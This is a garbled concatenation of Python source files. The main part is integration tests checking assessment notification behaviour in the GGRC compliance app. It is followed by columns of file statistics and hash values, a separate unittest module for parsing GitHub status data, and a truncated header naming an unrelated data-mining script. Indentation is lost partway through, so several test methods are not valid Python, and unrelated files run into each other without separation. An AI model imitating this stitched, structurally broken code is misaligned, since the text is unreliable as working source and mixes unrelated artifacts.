    recipient, _, content = send_email.call_args[0]
    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Reopened assessments", content)
@unittest.skip("An issue needs to be fixed.")
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_person_change(self, send_email):
  """Test if updating assessment people results in a reopen notification."""
  self.import_file("assessment_template_no_warnings.csv")
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_id, asmt_slug = asmt.id, asmt.slug

  for idx, done_state in enumerate(Assessment.DONE_STATES):
    # park the assessment in a "done" state and clear notifications
    asmt = Assessment.query.get(asmt_id)
    asmt.status = done_state
    db.session.commit()
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # reassigning the assessment must reopen it
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Assignee*", u"john{}@doe.com".format(idx)),
    )))
    reopened = self._get_notifications(notif_type="assessment_reopened")
    self.assertEqual(reopened.count(), 1)

    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]
    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Reopened assessments", content)
@ddt.ddt
class TestAssignableNotificationUsingAPI(TestAssignableNotification):
"""Tests for notifications when interacting with objects through an API."""
def setUp(self):
  """Prepare API and object-generation helpers used by the tests."""
  super(TestAssignableNotificationUsingAPI, self).setUp()
  # the two helpers are independent of each other
  self.objgen = generator.ObjectGenerator()
  self.api_helper = api_helper.Api()
@patch("ggrc.notifications.common.send_email")
def test_assessment_without_verifiers(self, send_email):
  """Test setting notification entries for simple assessments.

  This function tests that each assessment gets an entry in the
  notifications table after it's been created.
  """
  with freeze_time("2015-04-01"):
    self.assertEqual(self._get_notifications().count(), 0)
    self.import_file("assessment_template_no_warnings.csv", safe=False)
    self.import_file("assessment_with_templates.csv")
    asmts = {asmt.slug: asmt for asmt in Assessment.query}

    # each of the six imported assessments gets an "open" notification,
    # and each notification gets a revision entry
    notifs = self._get_notifications(notif_type="assessment_open").all()
    self.assertEqual(len(notifs), 6)
    revisions = Revision.query.filter(
        Revision.resource_type == 'Notification',
        Revision.resource_id.in_([notif.id for notif in notifs])
    ).count()
    self.assertEqual(revisions, 6)

    # deleting an assessment removes its pending notification
    self.api_helper.delete(asmts["A 1"])
    self.api_helper.delete(asmts["A 6"])
    self.assertEqual(self._get_notifications().count(), 4)

    # sending the digest clears the queue
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # editing an assessment in an active state should result in an
    # "updated" notification
    asmt = Assessment.query.get(asmts["A 5"].id)
    self.api_helper.modify_object(
        asmt, {"status": Assessment.PROGRESS_STATE})
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)
    asmt = Assessment.query.get(asmts["A 5"].id)
    self.api_helper.modify_object(asmt, {"description": "new description"})
    query = self._get_notifications(notif_type="assessment_updated")
    self.assertEqual(query.count(), 1)

    # the assessment updated notification should be sent even if there exists
    # a status change notification, regardless of the order of actions
    asmt = Assessment.query.get(asmts["A 5"].id)
    self.api_helper.modify_object(
        asmt, {"status": Assessment.DONE_STATE})
    asmt = Assessment.query.get(asmts["A 5"].id)
    self.api_helper.modify_object(asmt, {"description": "new description 2"})
    self.client.get("/_notifications/send_daily_digest")
    _, _, content = send_email.call_args[0]
    self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_with_verifiers(self, _):
  """Test notifications entries for declined assessments.

  This tests makes sure that there are extra notification entries added when
  an assessment has been declined.
  """
  with freeze_time("2015-04-01"):
    self.assertEqual(self._get_notifications().count(), 0)
    self.import_file("assessment_template_no_warnings.csv", safe=False)
    self.import_file("assessment_with_templates.csv")
    asmts = {asmt.slug: asmt for asmt in Assessment.query}

    # seven notifications are created by the import; each has a revision
    notifications = self._get_notifications().all()
    self.assertEqual(len(notifications), 7)
    revisions = Revision.query.filter(
        Revision.resource_type == 'Notification',
        Revision.resource_id.in_([notif.id for notif in notifications])
    ).count()
    self.assertEqual(revisions, 7)

    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    asmt1 = Assessment.query.get(asmts["A 5"].id)
    # start and finish assessment 1
    self.api_helper.modify_object(asmt1,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 1)
    self.api_helper.modify_object(asmt1, {"status": Assessment.DONE_STATE})
    self.assertEqual(self._get_notifications().count(), 1)

    # decline assessment 1
    self.api_helper.modify_object(asmt1,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 2)
    self.api_helper.modify_object(asmt1, {"status": Assessment.DONE_STATE})
    self.assertEqual(self._get_notifications().count(), 1)

    # decline assessment 1 the second time
    self.api_helper.modify_object(asmt1,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 2)

    asmt6 = Assessment.query.get(asmts["A 6"].id)
    # start and finish assessment 6
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 3)
    self.api_helper.modify_object(asmt6, {"status": Assessment.DONE_STATE})
    self.assertEqual(self._get_notifications().count(), 3)
    # decline assessment 6
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 4)

    # send all notifications
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # Refresh the object because of the lost session due to the get call.
    asmt6 = Assessment.query.get(asmts["A 6"].id)
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 0)
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.DONE_STATE})
    self.assertEqual(self._get_notifications().count(), 1)
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.VERIFIED_STATE})
    self.assertEqual(self._get_notifications().count(), 1)
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 1)
    # decline assessment 6
    self.api_helper.modify_object(asmt6, {"status": Assessment.DONE_STATE})
    self.assertEqual(self._get_notifications().count(), 1)
    self.api_helper.modify_object(asmt6,
                                  {"status": Assessment.PROGRESS_STATE})
    self.assertEqual(self._get_notifications().count(), 2)
@patch("ggrc.notifications.common.send_email")
def test_assessment_started_notification(self, send_email):
"""Test that starting an Assessment results in a notification."""
with freeze_time("2015-04-01"):
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt1 = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(asmt1,
{"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertRegexpMatches(content, ur"Assessment\s+has\s+been\s+started")
@patch("ggrc.notifications.common.send_email")
def test_editing_not_started_assessment(self, send_email):
"""Test that Assessment started notification masks updated notification.
"""
with freeze_time("2015-04-01"):
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt1 = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(
asmt1, {"description": "new asmt5 description"})
self.client.get("/_notifications/send_daily_digest")
recipient, _, content = send_email.call_args[0]
self.assertEqual(recipient, u"user@example.com")
self.assertRegexpMatches(content, ur"Assessment\s+has\s+been\s+started")
self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_reverting_assessment_status_changes(self, _):
  """Test that undoing a status change might NOT trigger a notification.

  One use case is when a user verifies an assessment in review, but then
  clicks the Undo button to revert the change. A status change notification
  should not be sent in such cases.
  """
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")
  by_slug = {item.slug: item for item in Assessment.query}
  asmt_id = by_slug["A 4"].id

  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # mark Assessment as in review, verify it, then revert the change
  assessment = Assessment.query.get(asmt_id)
  self.api_helper.modify_object(
      assessment, {"status": Assessment.DONE_STATE})
  assessment = Assessment.query.get(asmt_id)
  self.api_helper.modify_object(
      assessment,
      {"status": Assessment.FINAL_STATE, "verified_date": datetime.now()}
  )

  # clear notifications
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # changing the status back to the previous one is effectively reopening
  # an Assessment
  assessment = Assessment.query.get(asmt_id)
  self.api_helper.modify_object(
      assessment, {"status": Assessment.DONE_STATE, "verified_date": None})

  # the undo must produce neither a reopen nor a change notification
  reopened = self._get_notifications(notif_type="assessment_reopened")
  self.assertEqual(reopened.count(), 0)
  updated = self._get_notifications(notif_type="assessment_updated")
  self.assertEqual(updated.count(), 0)
@patch("ggrc.notifications.common.send_email")
def test_multiple_assessment_state_changes_notification(self, send_email):
  """Test if several assessment state changes result in a single notification.

  Users should only be notified about the last state change, and not about
  every state change that happened.
  """
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  asmt = Assessment.query.get(by_slug["A 1"].id)
  asmt_id = asmt.id
  asmt.status = Assessment.START_STATE
  db.session.commit()

  # start from a clean notification slate
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # make multiple state transitions and check that only the last one is
  # actually retained
  transitions = (
      Assessment.PROGRESS_STATE,
      Assessment.DONE_STATE,
      Assessment.PROGRESS_STATE,
      Assessment.FINAL_STATE,
  )
  for target_state in transitions:
    refreshed = Assessment.query.get(asmt_id)
    self.api_helper.modify_object(refreshed, {"status": target_state})

  self.client.get("/_notifications/send_daily_digest")
  recipient, _, content = send_email.call_args[0]
  self.assertEqual(recipient, u"user@example.com")
  # only the final (completed) transition may appear in the digest
  self.assertNotIn(u"Assessments in review", content)
  self.assertNotIn(u"Declined assessments", content)
  self.assertNotIn(u"Reopened assessments", content)
  self.assertIn(u"Completed assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_assessment_reopen_notifications_on_edit(self, send_email):
  """Test if updating assessment results in reopen notification."""
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")

  by_slug = {item.slug: item for item in Assessment.query}
  first = Assessment.query.get(by_slug["A 1"].id)
  asmt_id, asmt_slug = first.id, first.slug

  for idx, done_state in enumerate(Assessment.DONE_STATES):
    # force the assessment into a "done" state, flush notifications
    current = Assessment.query.get(asmt_id)
    current.status = done_state
    db.session.commit()
    self.client.get("/_notifications/send_daily_digest")
    self.assertEqual(self._get_notifications().count(), 0)

    # a title edit must reopen the assessment
    self.import_data(OrderedDict((
        (u"object_type", u"Assessment"),
        (u"Code*", asmt_slug),
        (u"Title", u"New Assessment 1 title - " + unicode(idx)),
    )))
    reopened = self._get_notifications(notif_type="assessment_reopened")
    self.assertEqual(reopened.count(), 1)

    self.client.get("/_notifications/send_daily_digest")
    recipient, _, content = send_email.call_args[0]
    self.assertEqual(recipient, u"user@example.com")
    self.assertIn(u"Reopened assessments", content)
@patch("ggrc.notifications.common.send_email")
def test_changing_custom_attributes_triggers_change_notification(self, _):
  """Test that updating Assessment's CA value results in change notification.
  """
  # declare two assessment CA definitions; they are re-queried from the DB
  # below when needed (the original code bound the second one to a variable
  # that was immediately shadowed before use -- dead store removed)
  CAD(definition_type="assessment", title="CA 1",)
  CAD(definition_type="assessment", title="CA 2",)

  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")
  asmts = {asmt.slug: asmt for asmt in Assessment.query}

  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # set initial CA value on the Assessment (also to put it into "In Progress"
  cad2 = CustomAttributeDefinition.query.filter(
      CustomAttributeDefinition.title == "CA 2").one()
  val2 = CustomAttributeValue(attribute_value="1a2b3", custom_attribute=cad2)
  asmt4 = Assessment.query.get(asmts["A 4"].id)

  self.api_helper.modify_object(
      asmt4,
      {
          "custom_attribute_values": [{
              "attributable_id": asmt4.id,
              "attributable_type": "Assessment",
              "id": val2.id,
              "custom_attribute_id": cad2.id,
              "attribute_value": val2.attribute_value,
          }]
      }
  )

  # there should be a notification...
  self.assertEqual(
      self._get_notifications(notif_type="assessment_updated").count(), 1)

  # now change the CA value and check if notification gets generated
  cad2 = CustomAttributeDefinition.query.filter(
      CustomAttributeDefinition.title == "CA 2").one()
  val2 = CustomAttributeValue(attribute_value="NEW", custom_attribute=cad2)
  asmt4 = Assessment.query.get(asmts["A 4"].id)

  self.api_helper.modify_object(
      asmt4,
      {
          "custom_attribute_values": [{
              "attributable_id": asmt4.id,
              "attributable_type": "Assessment",
              "custom_attribute_id": cad2.id,
              "id": val2.id,
              "attribute_value": val2.attribute_value,
          }]
      }
  )

  notifs = self._get_notifications(notif_type="assessment_updated").all()
  self.assertEqual(len(notifs), 1)
@patch("ggrc.notifications.common.send_email")
def test_directly_completing_assessments(self, _):
  """Test that immediately finishing an Assessment produces a notification.

  "Immediately" here means directly sending an Assessment to either the
  "Completed", or the "In Review" state, skipping the "In Progress"
  state.
  """
  self.import_file("assessment_template_no_warnings.csv", safe=False)
  self.import_file("assessment_with_templates.csv")
  by_slug = {item.slug: item for item in Assessment.query}

  # clear notifications left over from the import
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # directly sending an Assessment to the "In Review" state
  in_review = Assessment.query.get(by_slug["A 4"].id)
  self.api_helper.modify_object(in_review,
                                {"status": Assessment.DONE_STATE})
  self.assertEqual(self._get_notifications().count(), 1)

  # clear notifications
  self.client.get("/_notifications/send_daily_digest")
  self.assertEqual(self._get_notifications().count(), 0)

  # directly sending an Assessment to the "Completed" state
  completed = Assessment.query.get(by_slug["A 5"].id)
  self.api_helper.modify_object(completed,
                                {"status": Assessment.FINAL_STATE})
  self.assertEqual(self._get_notifications().count(), 1)
@patch("ggrc.notifications.common.send_email")
def test_changing_assigned_people_triggers_notifications(self, _):
"""Test that changing Assessment people results in change notification.
Adding (removing) a person to (from) Assessment should be detected and
considered an Assessment change.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# add an Assignee, there should be no notifications because the Assessment
# has not been started yet
person = factories.PersonFactory()
response, relationship = self.objgen.generate_relationship(
person, asmt, attrs={"AssigneeType": "Assignees"})
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# move Assessment to to "In Progress" state and clear notifications
self.api_helper.modify_object(
asmt, {"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# assign another Assignee, change notification should be created
person2 = factories.PersonFactory()
response, _ = self.objgen.generate_relationship(
person2, asmt, attrs={"AssigneeType": "Assignees"})
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# clear notifications, assign the same person as Verfier, check for
# change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# clear notifications, delete an Assignee, test for change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.delete(relationship)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# clear notifications, delete one of the person's roles, test for
# change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
# changing people if completed should result in "reopened" notification
# TODO: contrary to how relations to Documents behave, assigning a Person
# to an Assessment causes the latter to be immediately moved to the
# "In Progress" state, making the relationship change handler to think that
# the Assessment was modified in the "In Progress" state, resulting in
# a missing assessment_reopened notification. We thus skip this check for
# the time being.
# asmt = Assessment.query.get(asmts["A 5"].id)
# self.api_helper.modify_object(
# asmt, {"status": Assessment.FINAL_STATE})
# self.client.get("/_notifications/send_daily_digest")
# self.assertEqual(self._get_notifications().count(), 0)
# asmt = Assessment.query.get(asmts["A 5"].id)
# person = factories.PersonFactory()
# response, relationship = self.objgen.generate_relationship(
# person, asmt, attrs={"AssigneeType": "Assignees"})
# self.assertEqual(response.status_code, 201)
# reopened_notifs = self._get_notifications(
# notif_type="assessment_reopened")
# self.assertEqual(reopened_notifs.count(), 1)
@patch("ggrc.notifications.common.send_email")
def test_changing_assessment_urls_triggers_notifications(self, _):
"""Test that changing Assessment URLs results in change notification.
Adding (removing) a URL to (from) Assessment should be detected and
considered an Assessment change.
"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmts = {asmt.slug: asmt for asmt in Assessment.query}
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# add a URL, there should be no notifications because the Assessment
# has not been started yet
url = factories.EvidenceUrlFactory(link="www.foo.com")
response, relationship = self.objgen.generate_relationship(url, asmt)
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# move Assessment to to "In Progress" state and clear notifications
self.api_helper.modify_object(
asmt, {"status": Assessment.PROGRESS_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
# add another URL, change notification should be created
url2 = factories.EvidenceUrlFactory(link="www.bar.com")
response, _ = self.objgen.generate_relationship(url2, asmt)
self.assertEqual(response.status_code, 201)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# clear notifications, delete a URL, test for change notification
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(change_notifs.count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.delete(relationship)
change_notifs = self._get_notifications(notif_type="assessment_updated")
self.assertEqual(change_notifs.count(), 1)
# changing URLs if completed should result in "reopened" notification
asmt = Assessment.query.get(asmts["A 5"].id)
self.api_helper.modify_object(
asmt, {"status": Assessment.FINAL_STATE})
self.client.get("/_notifications/send_daily_digest")
self.assertEqual(self._get_notifications().count(), 0)
asmt = Assessment.query.get(asmts["A 5"].id)
url = factories.EvidenceUrlFactory(link="www.abc.com")
response, relationship = self.objgen.generate_relationship(url, asmt)
self.assertEqual(response.status_code, 201)
reopened_notifs = self._get_notifications(notif_type="assessment_reopened")
self.assertEqual(reopened_notifs.count(), 1)
@ddt.data("/_notifications/send_daily_digest", "nightly_cron_endpoint")
@patch("ggrc.notifications.common.send_email")
def test_notifications_missing_revision(self, url, send_email):
"""Test notifications with missing revision"""
self.import_file("assessment_template_no_warnings.csv", safe=False)
self.import_file("assessment_with_templates.csv")
asmt = Assessment.query.filter_by(slug="A 1").first()
self.api_helper.put(asmt, {"title": "New title"})
Revision.query.filter_by(
resource_id=asmt.id,
resource_type=asmt.type
).delete()
db.session.commit()
self.client.get(url)
_, _, content = send_email.call_args[0]
self.assertIn(u"Assessments have been updated", content)
@patch("ggrc.notifications.common.send_email")
def test_comment_notifications_after_import_file(self, send_email):
"""Test comment notification after importing from file"""
self.assertEqual(len(all_models.Comment.query.all()), 0)
self.import_file("import_comments.csv", safe=False)
self.assertNotEqual(len(all_models.Comment.query.all()), 0)
comments = all_models.Comment.query.all()
comments = [comment.description for comment in comments]
self.client.get("/_notifications/send_daily_digest")
_, _, content = send_email.call_args[0]
for comment in comments:
self.assertIn(comment, content)
  def test_evidence_notifications_missing_revision(self):
    """Test evidence notification after adding to assessment
    with missing revision.

    Mapping Evidence to an Assessment without revisions must fail with a
    500 / MISSING_REVISION error and must not leave the evidence mapped.
    """
    self.import_file("assessment_template_no_warnings.csv", safe=False)
    self.import_file("assessment_with_templates.csv")
    slug = "A 2"
    asmt = Assessment.query.filter_by(slug=slug).first()
    # delete all revisions of the assessment to simulate missing history
    Revision.query.filter_by(
        resource_id=asmt.id,
        resource_type=asmt.type
    ).delete()
    db.session.commit()
    expected_evidence_url = u"www.foo-url.bar"
    evidence_data = dict(
        title=expected_evidence_url,
        kind="URL",
        link=expected_evidence_url,
    )
    _, evidence = self.objgen.generate_object(
        all_models.Evidence,
        evidence_data
    )
    # re-fetch the assessment; the session was committed above
    asmt = Assessment.query.filter_by(slug=slug).first()
    response = self.api_helper.put(asmt, {
        "actions": {
            "add_related": [{"id": evidence.id, "type": "Evidence"}]
        }
    })
    self.assert500(response)
    self.assertEqual(response.json["message"], errors.MISSING_REVISION)
    # the failed mapping must not leave a partially related evidence behind
    url = "/api/assessments/{}/related_objects".format(asmt.id)
    response = self.client.get(url)
    self.assert200(response)
    content = response.json
    evidence_urls = content["Evidence:URL"]
    self.assertEqual(len(evidence_urls), 0)
  def test_comment_notifications_missing_revision(self):
    """Test comment notification after adding to assessment
    with missing revision.

    Mapping a Comment to an Assessment without revisions must fail with a
    500 / MISSING_REVISION error and must not leave the comment mapped.
    """
    self.import_file("assessment_template_no_warnings.csv", safe=False)
    self.import_file("assessment_with_templates.csv")
    slug = "A 1"
    asmt = Assessment.query.filter_by(slug=slug).first()
    # delete all revisions of the assessment to simulate missing history
    Revision.query.filter_by(
        resource_id=asmt.id,
        resource_type=asmt.type
    ).delete()
    db.session.commit()
    expected_comment = "some comment"
    # re-fetch the assessment; the session was committed above
    asmt = Assessment.query.filter_by(slug=slug).first()
    request_data = [{
        "comment": {
            "description": expected_comment,
            "send_notification": True,
            "context": None
        }
    }]
    response = self.api_helper.post(all_models.Comment, request_data)
    self.assert200(response)
    comment = all_models.Comment.query.first()
    # people-mentions handling is patched out so the failure below comes
    # from the missing-revision check alone
    with patch("ggrc.notifications.people_mentions.handle_comment_mapped"):
      response = self.api_helper.put(asmt, {
          "actions": {
              "add_related": [{"id": comment.id, "type": "Comment"}]
          }
      })
    self.assert500(response)
    self.assertEqual(response.json["message"], errors.MISSING_REVISION)
    # the failed mapping must not leave the comment related to the assessment
    url = "/api/assessments/{}/related_objects".format(asmt.id)
    response = self.client.get(url)
    self.assert200(response)
    comments = response.json["Comment"]
    self.assertEqual(len(comments), 0)
| 38.919794
| 80
| 0.700616
| 6,557
| 52,892
| 5.448223
| 0.063139
| 0.074348
| 0.055425
| 0.053298
| 0.855363
| 0.832718
| 0.821856
| 0.80243
| 0.788657
| 0.768755
| 0
| 0.00763
| 0.177361
| 52,892
| 1,358
| 81
| 38.948454
| 0.813404
| 0.075985
| 0
| 0.805585
| 0
| 0
| 0.208092
| 0.114871
| 0
| 0
| 0
| 0.000736
| 0.195489
| 0
| null | null | 0
| 0.108486
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ab0e9431a1809999fe3f59fcce2a2324fa11f14a
| 4,813
|
py
|
Python
|
TP3/test_parse_gh_statuses_file.py
|
will-afs/PYT
|
e2ad09d3449a28124a033dcc7ddd0429cbd18239
|
[
"MIT"
] | null | null | null |
TP3/test_parse_gh_statuses_file.py
|
will-afs/PYT
|
e2ad09d3449a28124a033dcc7ddd0429cbd18239
|
[
"MIT"
] | null | null | null |
TP3/test_parse_gh_statuses_file.py
|
will-afs/PYT
|
e2ad09d3449a28124a033dcc7ddd0429cbd18239
|
[
"MIT"
] | null | null | null |
import unittest
import os
from parse_gh_statuses_file import get_status_from_gh_statuses_data_file, get_statuses_from_gh_statuses_data_file
DATA_FILE_URL = '/home/william/Programming/PYT/TP3/'
DATA_FILE_URI = 'data'
DATA_FILE_URN = DATA_FILE_URL + DATA_FILE_URI
class TestParseGHStatusesFile(unittest.TestCase):
    """Tests for get_status_from_gh_statuses_data_file."""

    def test_get_status_from_gh_statuses_data_file_file_not_found(self):
        """A non-existent data file must raise FileNotFoundError."""
        # Bug fix: the original prepended DATA_FILE_URL to an already
        # absolute path, producing a nonsensical double path
        # ('/home/.../TP3//home/.../file_not_exists'). The test only passed
        # by accident; use the missing absolute path directly.
        missing_path = '/home/william/Programming/PYT/TP3/file_not_exists'
        with self.assertRaises(FileNotFoundError):
            get_status_from_gh_statuses_data_file(
                gh_statuses_data_file_path=missing_path,
                status_id=1
            )

    def test_get_status_from_gh_statuses_data_file_id_not_found(self):
        """An unknown status id must yield an empty dict."""
        status = get_status_from_gh_statuses_data_file(
            status_id=-1,
            gh_statuses_data_file_path=DATA_FILE_URN
        )
        self.assertEqual(status, {})

    def test_get_status_from_gh_statuses_data_file_success(self):
        """A known status id is returned with a matching 'id' field."""
        status = get_status_from_gh_statuses_data_file(
            status_id=2489368118,
            gh_statuses_data_file_path=DATA_FILE_URN
        )
        self.assertEqual(int(status['id']), 2489368118)

    def test_get_status_from_gh_statuses_data_file_wrong_file_format(self):
        """A file with an unexpected format must yield an empty dict."""
        data_file_uri = 'wrong_file_format'
        data_file_urn = DATA_FILE_URL + data_file_uri
        status = get_status_from_gh_statuses_data_file(
            status_id=2489368118,
            gh_statuses_data_file_path=data_file_urn
        )
        self.assertEqual(status, {})
class TestGetStatusesFromGHStatusesFile(unittest.TestCase):
    """Tests for get_statuses_from_gh_statuses_data_file.

    Bug fix: this class was previously named TestParseGHStatusesFile — the
    same name as the class above it. The second definition rebound the
    module attribute, shadowing the first class so its tests were silently
    never collected or run by unittest. Renaming restores both suites.
    """

    def test_get_statuses_from_gh_statuses_data_file_full_success(self):
        """Without paging, all 7702 statuses are returned in file order."""
        statuses = get_statuses_from_gh_statuses_data_file(
            gh_statuses_data_file_path=DATA_FILE_URN,
        )
        self.assertEqual(len(statuses), 7702)
        self.assertEqual(int(statuses[7701]['id']), 2489395761)

    def test_get_statuses_from_gh_statuses_data_file_page_success(self):
        """Paging returns exactly page_size items from the requested page."""
        statuses = get_statuses_from_gh_statuses_data_file(
            gh_statuses_data_file_path=DATA_FILE_URN,
            page=2,
            page_size=3
        )
        self.assertEqual(len(statuses), 3)
        self.assertEqual(int(statuses[0]['id']), 2489368095)

    def test_get_statuses_from_gh_statuses_data_file_not_found(self):
        """A non-existent data file must raise FileNotFoundError."""
        # Bug fix: the original prepended DATA_FILE_URL to an already
        # absolute path; use the missing absolute path directly.
        missing_path = '/home/william/Programming/PYT/TP3/file_not_exists'
        with self.assertRaises(FileNotFoundError):
            get_statuses_from_gh_statuses_data_file(
                gh_statuses_data_file_path=missing_path,
            )

    def test_get_statuses_from_gh_statuses_data_file_wrong_page_number_value(self):
        """A negative page number must raise ValueError."""
        with self.assertRaises(ValueError):
            get_statuses_from_gh_statuses_data_file(
                gh_statuses_data_file_path=DATA_FILE_URN,
                page=-88
            )

    def test_get_statuses_from_gh_statuses_data_file_page_number_out_of_range(self):
        """A page number past the end of the data must raise IndexError."""
        with self.assertRaises(IndexError):
            get_statuses_from_gh_statuses_data_file(
                gh_statuses_data_file_path=DATA_FILE_URN,
                page=1000000000000
            )

    def test_get_statuses_from_gh_statuses_data_file_wrong_page_size_value(self):
        """A negative page size must raise ValueError."""
        with self.assertRaises(ValueError):
            get_statuses_from_gh_statuses_data_file(
                gh_statuses_data_file_path=DATA_FILE_URN,
                page_size=-88
            )
# Run the test suite when the module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 50.135417
| 113
| 0.531893
| 477
| 4,813
| 4.763103
| 0.132075
| 0.207746
| 0.197183
| 0.253521
| 0.821743
| 0.809419
| 0.807218
| 0.737676
| 0.737676
| 0.608275
| 0
| 0.030172
| 0.421567
| 4,813
| 96
| 114
| 50.135417
| 0.78592
| 0
| 0
| 0.428571
| 0
| 0
| 0.03469
| 0.02742
| 0
| 0
| 0
| 0
| 0.155844
| 1
| 0.12987
| false
| 0
| 0.038961
| 0
| 0.194805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ab4ea5cc1201ee05f753c0349079707d44fb3d7e
| 102,068
|
py
|
Python
|
Project 1/source code/Classification.py
|
zenith378/Data-Mining
|
424590ab09b2ce7cb83c4a80bc4d9140a646fe76
|
[
"MIT"
] | 1
|
2022-01-05T10:16:35.000Z
|
2022-01-05T10:16:35.000Z
|
Project 1/source code/Classification.py
|
zenith378/Data-Mining
|
424590ab09b2ce7cb83c4a80bc4d9140a646fe76
|
[
"MIT"
] | null | null | null |
Project 1/source code/Classification.py
|
